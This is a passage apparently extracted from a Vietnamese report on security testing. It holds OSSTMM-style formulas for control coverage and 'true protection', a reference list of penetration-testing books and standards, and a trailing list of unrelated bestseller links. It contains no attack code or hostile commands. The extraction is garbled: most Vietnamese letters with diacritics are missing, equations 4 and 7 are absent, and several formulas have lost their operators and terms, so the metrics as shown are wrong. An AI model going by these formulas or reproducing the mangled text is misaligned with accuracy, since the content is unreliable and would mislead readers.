sum
: Tng ca kim
sot thiu
im yu L
W
MC
A
: Tng ca kim
sot thiu lp A
Quan tm L
C
MC
B
: Tng ca kim
sot thiu lp B
Tip xc L
E
P
V
: Tng ca Tm nhn
P
A
: Tng ca Truy cp
Bt thng L
A
P
T
: Tng ca Tin tng
MC
vg
: Phn trm thiu
bao ph
Bng b-1: Cng thc tnh cc i lng tnh SecLim_sum
MC
vg
c tnh theo thut ton nh sau:
IF OpSec
sum
0 THEN
MC
vg
= 0
ELSE
i lng cui cng trong cng thc tnh an ninh thc t l - lch
an ninh thc t, dng so snh sn phm v gii php bng cch c lng
nhng thay i ca sn phm hoc gii php c th c trong phm vi,
c tnh theo cng thc:
(4)
FC
base
l gi tr Kim sot y c s, tnh theo cng thc:
FC
base
= log
2
(1 + 10 x LC
sum
)
102
Ngoi ra, cn mt s gi tr l bo v thc s (TruPro) c th c s dng
nh l mt biu thc n gin bao ph ti u ca mt phm vi cho trong 100
c ngha l mt mi quan h ti u gia xp, Kim sot tin tng v Hn ch
an ninh. Bo v thc s c tnh theo cng thc:
TruPro = 100 + TC
base
OpSec
base
SecLim
base
(5)
Vi TC
base
l kim sot thc s c s, c tnh nh sau:
TC
base
= log
2
(1 + 100 x (OpSec
sum
MC
sum
x 0.1)) (6)
Da trn tng ging nh Kim sot thc s, Bao ph thc s (TCvg) c
th c s dng o lng t l phn trm ca cc kim sot v tr lin quan
n s lng ti u v v tr ca kim sot. Bao ph thc s sau c tnh bng
cch s dng tng s kim sot thiu v thut ton sau y:
IF OpSec
sum
<= 0
THEN TC
vg
= 0
ELSE
(7)
Kim sot thc s c s dng o v tr l tng ca cc kim sot. Cng
thc xc nh Kim sot thc s cho kim sot Xc thc (TC
Au
) c tnh nh
sau:
TC
Au
= OpSec
sum
MC
Au
Tng t vi 9 kim sot thc s cn li. T ta c gi tr tng kim sot
thc s (TC
sum
) c tnh nh di y:
TC
sum
= TC
Au
+TC
Id
+TC
Re
+TC
Su
+TC
Ct
+TC
NR
+TC
It
+TC
Pr
+TC
Cf
+TC
Al
103
PH LC C. TI LIU THAM KHO
Ti liu (theo cu trc: Tn tc gi nh xut bn nm xut bn):
[1] The art of software testing, second edition Glenford J. Myers Wiley Publishing
2004.
[2] Technical Guide to Information Security Testing and Assessment - Karen Scarfone,
Murugiah Souppaya, Amanda Cody, Angela Orebaugh 09/2008
http://csrc.nist.gov/publications/nistpubs/800-115/SP800-115.pdf
[3] BackTrack 4: Assuring Security by Penetration Testing Shakeel Ali, Tedi
Heriyanto Packt Publishing 04/2011.
[4] BackTrack 5: Wireless penetration testing Vivek Ramachandran Packt
Publishing 09/2011.
[5] OSSTMM 3: The open source security testing methodology manual Peter Herzog
ISECOM 2010.
[6] Build your own security lab A field guide for network testing Michael Gregg
Wiley Publishing 2008.
[7] Offensive security lab exercises Mati Aharoni 2007
[8] CompTIA Security+ Study guide fourth edition Emmett Dulaney Wiley
Publishing 2007.
[9] Study: A penetration testing model Federal Office for Information security BSI
[10] Network security assessment Chris McNab OReilly Publishing 2008.
[11] Enterprise network testing Andy Sholomon, Tom Kunath Cisco Press
03/2011.
[12] CEH Office certified ethical hacker review guide Kimberly Graves Wiley
Publishing
[13] The basics of hacking and penetration testing Dr. Patrick Engebretson Syngress
2011
[14] Metasploit The Penetration Testers Guide David Kennedy, Jim OGorman,
Devon Kearns v Mati Aharoni No Starch Press 2011
[15] Kim th v bo m cht lng phn mm Th.S Thc Bnh Cng Bi ging
in t mn hc
[16] Gio trnh kim th phn mm TS Nguyn Thanh Bnh 2008
[17] IEEE 610.12-1990. IEEE Standard Glossary of Software Engineering Terminology.
Technical report IEEE 1990.
[18] Pratical Software Testing Ilene Burnstein Springer 2002
[19] Research on Software Security. Testing World Academy of Science Engineering
and Technology F. Y. Gu Tian-yang, Shi Yin-sheng & Yuan 2010
[20] Vulnerability scanners; Master of Science Thesis Johan Nilsson
http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.102.7785&rep=rep1&typ
e=pdf&ei=3LaLT-
mjDbGSiQfz48zGCQ&usg=AFQjCNEk_3RdDERZC7oYVi8aYBnOCVsA9g
[21] Hercules vulnerability assessment and Remediation overview Citadel Security
Software Inc. https://hercules.citadel.com/docs/301VulGuide.pdf 07/2004
[22] Software Security Testing Bruce Potter, Gary McGraw 2004
104
[23] Network security testing IXIA
http://www.ixiacom.com/solutions/testing_security 02/2011
[24] NIST SP 800-115, Technical Guide to Information Security Testing and
Assessment, http://csrc.nist.gov/publications/nistpubs/800-115/SP800-115.pdf
Karen Scarfone, Murugiah Souppaya, Amanda Cody, Angela Orebaugh National
Institute of Standards and Technology 09/2008
[25] The art of intrusion: The Real Stories Behind the Exploits of Hackers, Intruders &
Deceivers Kevin D. Mitnick, William L. Simon Wiley publishing 2005
[26] Information Systems Security Assessment Framework(ISSAF) draft 0.2 OISSG
30/04/2006
[27] OWASP testing guide version 3.0 OWASP Foundation 2008
[28] An Integrated Application of Security Testing Methodologies to e-voting Systems
Marco Ramilli and Marco Prandini University of Bologna, Italy
[29] Towards a practical and effective security testing methodology Marco Prandini
and Marco Prandini University of Bologna, Italy
[30] How to build and use a honeypot Ralph Edward Sulton
http://www.infosecwriters.com/text_resources/pdf/build_and_use_honeypot.pdf
Online:
[i1] http://www.backtrack-linux.org
[i2] http://www.nessus.org
[i3] http://www.cert.org
[i4] http://www.isecom.org
[i5] http://www.oissg.org
[i6] http://www.owasp.org
[i7] http://projects.webappsec.org/threat-classification
[i8] http://www.hvaonline.net
[i9] http://www.bkav.com.vn/tieu_diem/-/view_content/content/tong-ket-tinh-hinh-
virus-va-an-ninh-mang-nam-2011
[i10] http://www.bitpipe.com/tlist/Vulnerability-Assessments.html
[i11] http://csrc.nist.gov/publications/nistpubs/800-92/SP800-92.pdf
[i12] http://checklists.nist.gov
[i13] http://scap.nist.gov
[i14] http://csrc.nist.gov/publications/nistpubs/800-97/SP800-97.pdf
[i15] http://csrc.nist.gov/publications/nistpubs/800-94/SP800-94.pdf
[i16] http://csrc.nist.gov/publications/nistpubs/800-30/sp800-30.pdf
[i17] http://www.idart.sandia.gov
[i18] http://csrc.nist.gov/publications/PubsSPs.html
[i19] http://www.nsa.gov/ia/industry/education/iam.cfm?MenuID=10.2.4.2
[i20] http://s-t-d.org
[i21] http://vipervast.sourceforge.net/index.html
[i22] http://fire.dmzs.com
[i23] http://www.e-fense.com/helix/
[i24] http://samurai.inguardians.com
[i25] http://sourceforge.net/projects/phlakproject/
[i26] http://www.pandasecurity.com
You might also like
- The Subtle Art of Not Giving a F*ck: A Counterintuitive Approach to Living a Good LifeFrom EverandThe Subtle Art of Not Giving a F*ck: A Counterintuitive Approach to Living a Good LifeRating: 4 out of 5 stars4/5 (5814)
- The 7 Habits of Highly Effective PeopleFrom EverandThe 7 Habits of Highly Effective PeopleRating: 4 out of 5 stars4/5 (353)
- The 7 Habits of Highly Effective People Personal WorkbookFrom EverandThe 7 Habits of Highly Effective People Personal WorkbookRating: 4 out of 5 stars4/5 (2515)
- The Iliad: The Fitzgerald TranslationFrom EverandThe Iliad: The Fitzgerald TranslationRating: 4 out of 5 stars4/5 (5646)
- The Odyssey: (The Stephen Mitchell Translation)From EverandThe Odyssey: (The Stephen Mitchell Translation)Rating: 4 out of 5 stars4/5 (7770)
- The Subtle Art of Not Giving a F*ck: A Counterintuitive Approach to Living a Good LifeFrom EverandThe Subtle Art of Not Giving a F*ck: A Counterintuitive Approach to Living a Good LifeRating: 4.5 out of 5 stars4.5/5 (20104)
- How to Win Friends and Influence People: Updated For the Next Generation of LeadersFrom EverandHow to Win Friends and Influence People: Updated For the Next Generation of LeadersRating: 4 out of 5 stars4/5 (2340)
- Pride and Prejudice: Bestsellers and famous BooksFrom EverandPride and Prejudice: Bestsellers and famous BooksRating: 4.5 out of 5 stars4.5/5 (20479)
- Never Split the Difference: Negotiating As If Your Life Depended On ItFrom EverandNever Split the Difference: Negotiating As If Your Life Depended On ItRating: 4.5 out of 5 stars4.5/5 (3313)
- Wuthering Heights Complete Text with ExtrasFrom EverandWuthering Heights Complete Text with ExtrasRating: 4 out of 5 stars4/5 (9955)
- The Picture of Dorian Gray (The Original 1890 Uncensored Edition + The Expanded and Revised 1891 Edition)From EverandThe Picture of Dorian Gray (The Original 1890 Uncensored Edition + The Expanded and Revised 1891 Edition)Rating: 4 out of 5 stars4/5 (9054)
- Art of War: The Definitive Interpretation of Sun Tzu's Classic Book of StrategyFrom EverandArt of War: The Definitive Interpretation of Sun Tzu's Classic Book of StrategyRating: 4 out of 5 stars4/5 (3321)
- Anna Karenina: Bestsellers and famous BooksFrom EverandAnna Karenina: Bestsellers and famous BooksRating: 4 out of 5 stars4/5 (7503)
- Habit 1 Be Proactive: The Habit of ChoiceFrom EverandHabit 1 Be Proactive: The Habit of ChoiceRating: 4 out of 5 stars4/5 (2559)
- American Gods: The Tenth Anniversary EditionFrom EverandAmerican Gods: The Tenth Anniversary EditionRating: 4 out of 5 stars4/5 (12956)
- Wuthering Heights (Seasons Edition -- Winter)From EverandWuthering Heights (Seasons Edition -- Winter)Rating: 4 out of 5 stars4/5 (9975)
- How To Win Friends And Influence PeopleFrom EverandHow To Win Friends And Influence PeopleRating: 4.5 out of 5 stars4.5/5 (6699)
- Habit 3 Put First Things First: The Habit of Integrity and ExecutionFrom EverandHabit 3 Put First Things First: The Habit of Integrity and ExecutionRating: 4 out of 5 stars4/5 (2508)
- The 7 Habits of Highly Effective PeopleFrom EverandThe 7 Habits of Highly Effective PeopleRating: 4 out of 5 stars4/5 (2571)
- Habit 6 Synergize: The Habit of Creative CooperationFrom EverandHabit 6 Synergize: The Habit of Creative CooperationRating: 4 out of 5 stars4/5 (2499)
- The Picture of Dorian Gray: Classic Tales EditionFrom EverandThe Picture of Dorian Gray: Classic Tales EditionRating: 4 out of 5 stars4/5 (9765)
- The Iliad: A New Translation by Caroline AlexanderFrom EverandThe Iliad: A New Translation by Caroline AlexanderRating: 4 out of 5 stars4/5 (5734)
